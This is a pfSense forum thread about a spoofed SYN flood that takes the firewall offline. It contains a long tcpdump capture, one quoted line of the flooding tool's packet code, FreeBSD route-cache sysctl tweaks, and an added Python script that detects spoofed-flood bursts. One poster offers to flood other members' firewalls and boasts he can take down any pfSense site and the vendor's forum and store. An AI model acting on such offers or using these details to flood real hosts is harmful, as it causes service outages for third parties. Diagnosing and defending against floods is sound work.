    10:30:39.513295 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 27034, offset 0, flags [none], proto TCP (6), length 40)
        190.99.190.67.52735 > 80.197.144.99.80: Flags [S], cksum 0xd9a5 (correct), seq 2854027264, win 0, length 0
    10:30:39.513299 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 64661, offset 0, flags [none], proto TCP (6), length 40)
        118.109.155.34.23598 > 80.197.144.99.80: Flags [S], cksum 0x4deb (correct), seq 314638336, win 0, length 0
    10:30:39.513306 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 56817, offset 0, flags [none], proto TCP (6), length 40)
        88.170.38.208.52781 > 80.197.144.99.80: Flags [S], cksum 0xf671 (correct), seq 2320498688, win 0, length 0
    10:30:39.513311 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 34707, offset 0, flags [none], proto TCP (6), length 40)
        110.166.177.145.23689 > 80.197.144.99.80: Flags [S], cksum 0x71d9 (correct), seq 3754885120, win 0, length 0
    10:30:39.513315 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 55794, offset 0, flags [none], proto TCP (6), length 40)
        94.43.246.118.9586 > 80.197.144.99.80: Flags [S], cksum 0xb3bd (correct), seq 2694316032, win 0, length 0
    10:30:39.513320 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 52303, offset 0, flags [none], proto TCP (6), length 40)
        213.89.0.90.40753 > 80.197.144.99.80: Flags [S], cksum 0x68b3 (correct), seq 4040228864, win 0, length 0
    10:30:39.513326 00:0c:29:d4:ef:2c > 4c:00:82:ee:cf:d9, ethertype IPv4 (0x0800), length 58: (tos 0x0, ttl 127, id 261, offset 0, flags [DF], proto TCP (6), length 44)
        80.197.144.99.80 > 216.157.141.54.9831: Flags [S.], cksum 0x9a91 (correct), seq 2949879653, ack 680984577, win 8192, options [mss 1460], length 0
    10:30:39.513332 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 28785, offset 0, flags [none], proto TCP (6), length 40)
        91.25.215.249.27514 > 80.197.144.99.80: Flags [S], cksum 0x59f5 (correct), seq 3588685824, win 0, length 0
    10:30:39.513344 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 52053, offset 0, flags [none], proto TCP (6), length 40)
        177.13.166.204.32876 > 80.197.144.99.80: Flags [S], cksum 0xf5b1 (correct), seq 7471104, win 0, length 0
    10:30:39.513349 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 1589, offset 0, flags [none], proto TCP (6), length 40)
        219.189.244.20.17361 > 80.197.144.99.80: Flags [S], cksum 0xb745 (correct), seq 58785792, win 0, length 0
    10:30:39.513354 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 26750, offset 0, flags [none], proto TCP (6), length 40)
        63.48.11.253.57233 > 80.197.144.99.80: Flags [S], cksum 0x0017 (correct), seq 2744385536, win 0, length 0
    10:30:39.513358 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 23381, offset 0, flags [none], proto TCP (6), length 40)
        200.108.55.167.11648 > 80.197.144.99.80: Flags [S], cksum 0x85d7 (correct), seq 452919296, win 0, length 0
    10:30:39.513363 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 53581, offset 0, flags [none], proto TCP (6), length 40)
        37.55.185.36.60295 > 80.197.144.99.80: Flags [S], cksum 0xebcb (correct), seq 414908416, win 0, length 0
    10:30:39.513371 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 39173, offset 0, flags [none], proto TCP (6), length 40)
        67.87.60.183.39445 > 80.197.144.99.80: Flags [S], cksum 0x4793 (correct), seq 1823670272, win 0, length 0
    10:30:39.513376 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 23125, offset 0, flags [none], proto TCP (6), length 40)
        36.103.23.138.50138 > 80.197.144.99.80: Flags [S], cksum 0xed1f (correct), seq 3783131136, win 0, length 0
    10:30:39.513381 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 59205, offset 0, flags [none], proto TCP (6), length 40)
        121.160.127.210.11664 > 80.197.144.99.80: Flags [S], cksum 0xe00b (correct), seq 3344629760, win 0, length 0
    10:30:39.513386 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 6157, offset 0, flags [none], proto TCP (6), length 40)
        76.192.43.182.47350 > 80.197.144.99.80: Flags [S], cksum 0xf953 (correct), seq 2745761792, win 0, length 0
    10:30:39.513391 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 42872, offset 0, flags [none], proto TCP (6), length 40)
        115.58.37.86.40228 > 80.197.144.99.80: Flags [S], cksum 0x76e6 (correct), seq 567214080, win 0, length 0
    10:30:39.513398 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 29957, offset 0, flags [none], proto TCP (6), length 40)
        176.6.73.99.25224 > 80.197.144.99.80: Flags [S], cksum 0x13a0 (correct), seq 1591214080, win 0, length 0
    10:30:39.513403 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 48650, offset 0, flags [none], proto TCP (6), length 40)
        8.68.171.27.33870 > 80.197.144.99.80: Flags [S], cksum 0x11e1 (correct), seq 2228944896, win 0, length 0
    10:30:39.513408 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 26457, offset 0, flags [none], proto TCP (6), length 40)
        94.38.149.168.14235 > 80.197.144.99.80: Flags [S], cksum 0xf10a (correct), seq 2985623552, win 0, length 0
    10:30:39.513413 00:0c:29:d4:ef:2c > 4c:00:82:ee:cf:d9, ethertype IPv4 (0x0800), length 58: (tos 0x0, ttl 127, id 262, offset 0, flags [DF], proto TCP (6), length 44)
        80.197.144.99.80 > 131.66.70.131.22774: Flags [S.], cksum 0x91bc (correct), seq 57387859, ack 862322689, win 8192, options [mss 1460], length 0
    10:30:39.513419 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 22501, offset 0, flags [none], proto TCP (6), length 40)
        195.160.175.23.11191 > 80.197.144.99.80: Flags [S], cksum 0x4ebf (correct), seq 3778740224, win 0, length 0
    10:30:39.513425 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 27576, offset 0, flags [none], proto TCP (6), length 40)
        223.227.192.194.46917 > 80.197.144.99.80: Flags [S], cksum 0x9152 (correct), seq 3844800512, win 0, length 0
    10:30:39.513441 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 43814, offset 0, flags [none], proto TCP (6), length 40)
        204.24.245.215.843 > 80.197.144.99.80: Flags [S], cksum 0x66a0 (correct), seq 2727215104, win 0, length 0
    10:30:39.513445 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 12500, offset 0, flags [none], proto TCP (6), length 40)
        189.41.42.152.5526 > 80.197.144.99.80: Flags [S], cksum 0x8104 (correct), seq 1343094784, win 0, length 0
    10:30:39.513450 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 34489, offset 0, flags [none], proto TCP (6), length 40)
        169.236.74.249.18580 > 80.197.144.99.80: Flags [S], cksum 0x6010 (correct), seq 819986432, win 0, length 0
    10:30:39.513455 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 35681, offset 0, flags [none], proto TCP (6), length 40)
        147.250.245.164.48820 > 80.197.144.99.80: Flags [S], cksum 0x729d (correct), seq 326696960, win 0, length 0
    10:30:39.513460 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 30816, offset 0, flags [none], proto TCP (6), length 40)
        193.179.137.86.23006 > 80.197.144.99.80: Flags [S], cksum 0x9c8a (correct), seq 2364997632, win 0, length 0
    10:30:39.513467 00:0c:29:d4:ef:2c > 4c:00:82:ee:cf:d9, ethertype IPv4 (0x0800), length 58: (tos 0x0, ttl 127, id 263, offset 0, flags [DF], proto TCP (6), length 44)
        80.197.144.99.80 > 44.0.129.199.14410: Flags [S.], cksum 0xa854 (correct), seq 374786227, ack 690814977, win 8192, options [mss 1460], length 0
    10:30:39.513480 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 18975, offset 0, flags [none], proto TCP (6), length 40)
        121.19.8.238.5090 > 80.197.144.99.80: Flags [S], cksum 0x3603 (correct), seq 42205184, win 0, length 0
    10:30:39.513487 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 8278, offset 0, flags [none], proto TCP (6), length 40)
        216.22.210.177.33699 > 80.197.144.99.80: Flags [S], cksum 0xe79f (correct), seq 3093168128, win 0, length 0
    10:30:39.513492 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 8242, offset 0, flags [none], proto TCP (6), length 40)
        194.244.107.73.23806 > 80.197.144.99.80: Flags [S], cksum 0xcd4b (correct), seq 1977745408, win 0, length 0
    10:30:39.513497 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 26266, offset 0, flags [none], proto TCP (6), length 40)
        107.175.181.36.50561 > 80.197.144.99.80: Flags , cksum 0x5fe4 (correct), seq 2284847104, win 0, length 0
    10:30:39.513503 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 48456, offset 0, flags [none], proto TCP (6), length 40)
        57.198.49.57.38923 > 80.197.144.99.80: Flags , cksum 0x8dd6 (correct), seq 1032388608, win 0, length 0
    10:30:39.513508 00:0c:29:d4:ef:2c > 4c:00:82:ee:cf:d9, ethertype IPv4 (0x0800), length 58: (tos 0x0, ttl 127, id 264, offset 0, flags [DF], proto TCP (6), length 44)
        80.197.144.99.80 > 2.198.224.97.4328: Flags [S.], cksum 0x8cf1 (correct), seq 2618298798, ack 1742536705, win 8192, options [mss 1460], length 0
    10:30:39.513524 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 10933, offset 0, flags [none], proto TCP (6), length 40)
        118.47.10.10.37511 > 80.197.144.99.80: Flags , cksum 0x77e0 (correct), seq 1137246208, win 0, length 0
    10:30:39.513530 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 18890, offset 0, flags [none], proto TCP (6), length 40)
        14.97.99.96.64512 > 80.197.144.99.80: Flags , cksum 0x444d (correct), seq 475725824, win 0, length 0
    10:30:39.513535 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 56690, offset 0, flags [none], proto TCP (6), length 40)
        213.185.151.218.28524 > 80.197.144.99.80: Flags , cksum 0x4ab7 (correct), seq 2796683264, win 0, length 0
    10:30:39.513540 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 10111, offset 0, flags [none], proto TCP (6), length 40)
        115.139.24.147.18068 > 80.197.144.99.80: Flags , cksum 0x0220 (correct), seq 4187422720, win 0, length 0
    10:30:39.513544 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 52710, offset 0, flags [none], proto TCP (6), length 40)
        71.173.24.70.9953 > 80.197.144.99.80: Flags , cksum 0x6dc6 (correct), seq 3654221824, win 0, length 0
    10:30:39.513552 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 14602, offset 0, flags [none], proto TCP (6), length 40)
        204.177.133.114.52854 > 80.197.144.99.80: Flags , cksum 0xccdc (correct), seq 3773956096, win 0, length 0
    10:30:39.513557 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 246, id 57342, offset 0, flags [none], proto TCP (6), length 40)
        193.10.116.216.4499 > 80.197.144.99.80: Flags [R.], cksum 0x62a2 (correct), seq 412614657, ack 272030576, win 8192, length 0
    10:30:39.513562 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 56996, offset 0, flags [none], proto TCP (6), length 40)
        177.149.63.251.26442 > 80.197.144.99.80: Flags , cksum 0xb4e5 (correct), seq 3232301056, win 0, length 0
    10:30:39.513566 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 15885, offset 0, flags [none], proto TCP (6), length 40)
        40.70.22.155.19703 > 80.197.144.99.80: Flags , cksum 0xdf78 (correct), seq 1662582784, win 0, length 0
    10:30:39.513572 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 32827, offset 0, flags [none], proto TCP (6), length 40)
        125.223.226.137.39765 > 80.197.144.99.80: Flags , cksum 0xd449 (correct), seq 4267769856, win 0, length 0
    10:30:39.513577 00:0c:29:d4:ef:2c > 4c:00:82:ee:cf:d9, ethertype IPv4 (0x0800), length 58: (tos 0x0, ttl 127, id 265, offset 0, flags [DF], proto TCP (6), length 44)
        80.197.144.99.80 > 170.170.168.141.23827: Flags [S.], cksum 0x2af0 (correct), seq 705454965, ack 769654785, win 8192, options [mss 1460], length 0
    10:30:39.513586 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 50018, offset 0, flags [none], proto TCP (6), length 40)
        159.28.31.228.48209 > 80.197.144.99.80: Flags , cksum 0xa3a2 (correct), seq 2943680512, win 0, length 0
    10:30:39.513591 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 63898, offset 0, flags [none], proto TCP (6), length 40)
        111.154.126.162.61744 > 80.197.144.99.80: Flags , cksum 0x74ec (correct), seq 2047868928, win 0, length 0
    10:30:39.513596 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 38298, offset 0, flags [none], proto TCP (6), length 40)
        16.190.128.37.39392 > 80.197.144.99.80: Flags , cksum 0x6e4b (correct), seq 895156224, win 0, length 0
    10:30:39.513601 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 59199, offset 0, flags [none], proto TCP (6), length 40)
        89.254.93.239.54706 > 80.197.144.99.80: Flags , cksum 0x0020 (correct), seq 1084882944, win 0, length 0
    10:30:39.513606 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 49941, offset 0, flags [none], proto TCP (6), length 40)
        152.194.98.1.53241 > 80.197.144.99.80: Flags , cksum 0x89ae (correct), seq 2046689280, win 0, length 0
    10:30:39.513622 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 4695, offset 0, flags [none], proto TCP (6), length 40)
        189.190.106.217.65131 > 80.197.144.99.80: Flags , cksum 0x1ba0 (correct), seq 2345009152, win 0, length 0
    10:30:39.513651 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 12874, offset 0, flags [none], proto TCP (6), length 40)
        219.88.57.232.26546 > 80.197.144.99.80: Flags , cksum 0x0244 (correct), seq 1328742400, win 0, length 0
    10:30:39.513676 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 28154, offset 0, flags [none], proto TCP (6), length 40)
        50.153.123.61.7786 > 80.197.144.99.80: Flags , cksum 0x0193 (correct), seq 9895936, win 0, length 0
    10:30:39.513681 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 29173, offset 0, flags [none], proto TCP (6), length 40)
        145.164.64.162.49027 > 80.197.144.99.80: Flags , cksum 0x9d60 (correct), seq 2671706112, win 0, length 0
    10:30:39.513686 00:0c:29:d4:ef:2c > 4c:00:82:ee:cf:d9, ethertype IPv4 (0x0800), length 58: (tos 0x0, ttl 127, id 266, offset 0, flags [DF], proto TCP (6), length 44)
        80.197.144.99.80 > 86.202.253.217.29017: Flags [S.], cksum 0xdb07 (correct), seq 719532581, ack 2559508481, win 8192, options [mss 1460], length 0


  • Banned

    I am, by the way, running stateless as a test since it doesn't have any impact running with SYN cookies enabled :)



  • After re-reading the code this morning and looking at the packet dump, it seems "tot_len" is being set and used as the IP+TCP header size.

    iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);

    No fragmented data wielding SYN packets here.



  • I've stopped a DDoS on my network by setting advanced rule options to limit connections per second and total states per IP.
    Then I've reduced the rule block time.

    My link dropped from 100% to 30% during attack.



  • In this case, total states per IP won't help because they're spoofed.

    I don't see what's so special about these packets. They're all the standard 60 length IP+TCP, and 40 length IP. Both IP and TCP checksums are valid, IP has no flags, TCP's only flag is SYN, random source ports, random Seq numbers. I must be missing something, but it looks like a normal SYN flood, but it isn't.
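    The properties listed in this reply (valid checksums, SYN as the only flag, a fresh source address and random sequence number on every packet, window 0, a narrow TTL band) are exactly what a defender can count on the wire. The following is an added example, not code from this thread, from pfSense or from FreeBSD: it parses the two-line-per-packet layout that `tcpdump -e -v` prints and tallies, per second, inbound SYNs, distinct sources, zero-window SYNs and the SYN-ACKs the firewall managed to send back. The sample lines are constructed in the same layout as the capture posted above, using RFC 5737 documentation addresses and made-up checksums, with the `Flags [S]` token restored (the forum software stripped it from the posted copy). The thresholds in `looks_like_spoofed_flood` are illustrative assumptions, not tuned values.

```python
"""Added example: summarise a tcpdump -e -v capture of a spoofed SYN flood.

Not code from the thread or from pfSense/FreeBSD. It reads the layout tcpdump
prints with -e -v (an Ethernet/IP header line, then the indented TCP line) and
reports, per second, how many SYNs arrived, from how many distinct sources,
how many advertised window 0, and how many SYN-ACKs the firewall sent back.
"""
import re
from collections import Counter, defaultdict

# First line of each packet: the timestamp and IP TTL are all we need from it.
HEADER_RE = re.compile(r"^\s*(\d\d:\d\d:\d\d)\.\d+ .*?ttl (\d+),")
# Second line: endpoints, TCP flags and the advertised window.
TCP_RE = re.compile(
    r"^\s+(\d+\.\d+\.\d+\.\d+)\.(\d+) > (\d+\.\d+\.\d+\.\d+)\.(\d+): "
    r"Flags \[([^\]]*)\],.*?\bwin (\d+)"
)

# Constructed sample (RFC 5737 addresses, made-up checksums) in the layout of the
# capture posted in the thread. Six spoofed SYNs and two SYN-ACK replies fall in
# one second; a single ordinary-looking SYN follows in the next second.
SAMPLE = """\
10:30:39.513408 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 26457, offset 0, flags [none], proto TCP (6), length 40)
    198.51.100.17.14235 > 203.0.113.9.80: Flags [S], cksum 0x0001 (correct), seq 2985623552, win 0, length 0
10:30:39.513413 00:0c:29:d4:ef:2c > 4c:00:82:ee:cf:d9, ethertype IPv4 (0x0800), length 58: (tos 0x0, ttl 127, id 262, offset 0, flags [DF], proto TCP (6), length 44)
    203.0.113.9.80 > 198.51.100.17.14235: Flags [S.], cksum 0x0002 (correct), seq 57387859, ack 2985623553, win 8192, options [mss 1460], length 0
10:30:39.513419 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 22501, offset 0, flags [none], proto TCP (6), length 40)
    192.0.2.45.11191 > 203.0.113.9.80: Flags [S], cksum 0x0003 (correct), seq 3778740224, win 0, length 0
10:30:39.513425 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 27576, offset 0, flags [none], proto TCP (6), length 40)
    192.0.2.200.46917 > 203.0.113.9.80: Flags [S], cksum 0x0004 (correct), seq 3844800512, win 0, length 0
10:30:39.513441 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 43814, offset 0, flags [none], proto TCP (6), length 40)
    198.51.100.88.843 > 203.0.113.9.80: Flags [S], cksum 0x0005 (correct), seq 2727215104, win 0, length 0
10:30:39.513445 00:0c:29:d4:ef:2c > 4c:00:82:ee:cf:d9, ethertype IPv4 (0x0800), length 58: (tos 0x0, ttl 127, id 263, offset 0, flags [DF], proto TCP (6), length 44)
    203.0.113.9.80 > 192.0.2.45.11191: Flags [S.], cksum 0x0006 (correct), seq 374786227, ack 3778740225, win 8192, options [mss 1460], length 0
10:30:39.513450 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 12500, offset 0, flags [none], proto TCP (6), length 40)
    203.0.113.77.5526 > 203.0.113.9.80: Flags [S], cksum 0x0007 (correct), seq 1343094784, win 0, length 0
10:30:39.513455 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 34489, offset 0, flags [none], proto TCP (6), length 40)
    198.51.100.3.18580 > 203.0.113.9.80: Flags [S], cksum 0x0008 (correct), seq 819986432, win 0, length 0
10:30:40.102211 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 74: (tos 0x0, ttl 64, id 4711, offset 0, flags [DF], proto TCP (6), length 60)
    192.0.2.100.51234 > 203.0.113.9.80: Flags [S], cksum 0x0009 (correct), seq 1, win 65535, options [mss 1460,nop,wscale 7], length 0
"""


def parse_tcpdump(text):
    """Return one dict per TCP packet found in tcpdump -e -v output."""
    packets, header = [], None
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            header = {"second": m.group(1), "ttl": int(m.group(2))}
            continue
        m = TCP_RE.match(line)
        if m and header is not None:
            src, sport, dst, dport, flags, win = m.groups()
            packets.append({**header, "src": src, "sport": int(sport),
                            "dst": dst, "dport": int(dport),
                            "flags": flags, "win": int(win)})
            header = None
    return packets


def summarize(packets, target_port=80):
    """Per-second counters for SYNs to target_port and SYN-ACKs sent from it."""
    per_sec = defaultdict(lambda: {"syn": 0, "synack": 0, "sources": set(),
                                   "win0": 0, "ttls": Counter()})
    for p in packets:
        s = per_sec[p["second"]]
        if p["flags"] == "S" and p["dport"] == target_port:
            s["syn"] += 1
            s["sources"].add(p["src"])
            s["ttls"][p["ttl"]] += 1
            if p["win"] == 0:
                s["win0"] += 1
        elif p["flags"] == "S." and p["sport"] == target_port:
            s["synack"] += 1
    return {sec: {"syn": s["syn"], "synack": s["synack"],
                  "unique_sources": len(s["sources"]), "win0": s["win0"],
                  "ttl_spread": len(s["ttls"])}
            for sec, s in per_sec.items()}


def looks_like_spoofed_flood(sec, min_syn=5, min_unique_ratio=0.9, min_win0_ratio=0.5):
    """Heuristic (thresholds are illustrative assumptions): a burst of SYNs in
    which nearly every packet comes from a source not seen before in that second,
    most advertising window 0, matches the posted capture; a burst from real
    clients reuses sources and advertises a normal window."""
    if sec["syn"] < min_syn:
        return False
    return (sec["unique_sources"] / sec["syn"] >= min_unique_ratio
            and sec["win0"] / sec["syn"] >= min_win0_ratio)


if __name__ == "__main__":
    for second, s in sorted(summarize(parse_tcpdump(SAMPLE)).items()):
        verdict = "spoofed SYN flood" if looks_like_spoofed_flood(s) else "normal"
        print(second, s, "->", verdict)
```

    The point the reply above makes is visible in the counters: every SYN in the flood second comes from a different address, so any per-source limit sees each address exactly once and never trips, while the aggregate SYN rate, the unique-source ratio and the gap between SYNs received and SYN-ACKs returned are the numbers worth alerting on. To feed real traffic in, capture with `tcpdump -e -v -n` on the WAN interface and a filter such as `'tcp[tcpflags] & (tcp-syn|tcp-ack) == tcp-syn'` to keep only bare SYNs, then pass the text to `parse_tcpdump`.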


  • Banned

    Send me a PM with your ext. IP and pfSense behind, looking at port 80.

    Then I will flood it for 180 secs and then you will see how it responds.

    It just goes offline instantly…



  • I don't know, sounds like a sure-fire way to get packet loss on my quality graph. Almost up to a week of 0 packets lost and a 1.2ms avg ping. Maybe in a few days, once I take a picture :-)

    I don't mean 0.0% packet loss, I mean 0 packets in actual numbers. I already have 0.0%, but there's some red on that quality graph.


  • Banned

    Chris would get back to us with testing IP but not heard anything yet.


  • Banned

    Look at the ping to the LAN side of pfSense…

    http://youtu.be/HoGQ_2sg0J0

    LAN goes offline and tries to keep going. On the test server I see maybe 25mbit of traffic and nothing that renders it useless at all.

    Pf just dies completely. With this I can take down any site running pfSense if I want to.

    If you run Windows FW on the server with no pfSense in front, no issues.



  • FYI, your public IP is shown on your interfaces widget.

    Another FYI, I get a nice stable ping to your gateway. Nice upstream :-)

    Ping statistics for 80.x.x.x:
        Packets: Sent = 149, Received = 149, Lost = 0 (0% loss),
    Approximate round trip times in milli-seconds:
        Minimum = 138ms, Maximum = 141ms, Average = 139ms

    4    15 ms    15 ms    16 ms  tengigabitethernet4-4.ar7.chi1.gblx.net [67.17.213.117]
      5  108 ms  107 ms  108 ms  4.68.110.157
      6  103 ms  103 ms  103 ms  ae-116-3502.edge3.London1.Level3.net [4.69.166.134]
      7  103 ms  103 ms  103 ms  ae-116-3502.edge3.London1.Level3.net [4.69.166.134]
      8  138 ms  138 ms  138 ms  tdcdenmark-level3-xe.london1.Level3.net [4.68.63.90]
      9  139 ms  140 ms  140 ms  ae1-0.taanqe10.dk.ip.tdc.net [83.88.22.247]
    10  140 ms  140 ms  141 ms  cpe.ae11-388.taanqe10.dk.customer.tdc.net [62.243.131.198]
    11  139 ms  139 ms  140 ms  80.x.x.x


  • Banned

    :D It's my home network so I don't care about that.

    Just removed Squid to see if it handles traffic better…

    Edit: It didn't... :(


  • Banned

    And the forum goes down at once as well.

    It's the engine of pfSense that's the issue here. There is core functionality hit here and nothing done in the GUI or elsewhere can prevent it.


  • Banned

    So what's up here? Anyone tested this on FreeBSD?


  • Banned

    Spoofed packet attacks may be used to overload the kernel route cache. A spoofed packet attack uses random source IPs to cause the kernel to generate a temporary cached route in the route table. Route cache is an extraneous caching layer mapping interfaces to routes to IPs and saves a lookup to the Forward Information Base (FIB); a routing table within the network stack. The IPv4 routing cache was intended to eliminate a FIB lookup and increase performance. While a good idea in principle, unfortunately it provided a very small performance boost in less than 10% of connections and opens up the possibility of a DoS vector. Setting rtexpire and rtminexpire to two (2) seconds should be sufficient to protect the route table from attack.

    http://www.es.freebsd.org/doc/handbook/securing-freebsd.html

    net.inet.ip.rtexpire=2      # (default 3600)
    net.inet.ip.rtminexpire=2    # (default 10  )
    #net.inet.ip.rtmaxcache=128  # (default 128 )

    Does anybody have any comments on this? It seems to be deep within the routing stack that this occurs.



  • Just out of curiosity, why would you want to store individual IP addresses in a routing table? Isn't that the whole point of subnet masks and routing tables?


  • Banned

    I don't know... it's nowhere to be found in pfSense so I added it manually to get rid of it...



  • So, is there progress being made in coming up with a set of safe defaults that mitigate this attack in 2.2.1?



  • So the change helped?

    It sounds like the best thing might be to completely disable. Since that probably can't happen, I wonder if there are values smaller than 2 seconds that may be better. I could see low-end boxes being much more sensitive to this issue. A lot of packets can come in a 2-second window with more and more people getting 100Mb+ connections.


  • Banned

    It didn't help. It takes this forum and store.netgate.com down as well, easily.

    Throughput needs only to be about 20mbit before it dies and can't handle the traffic.

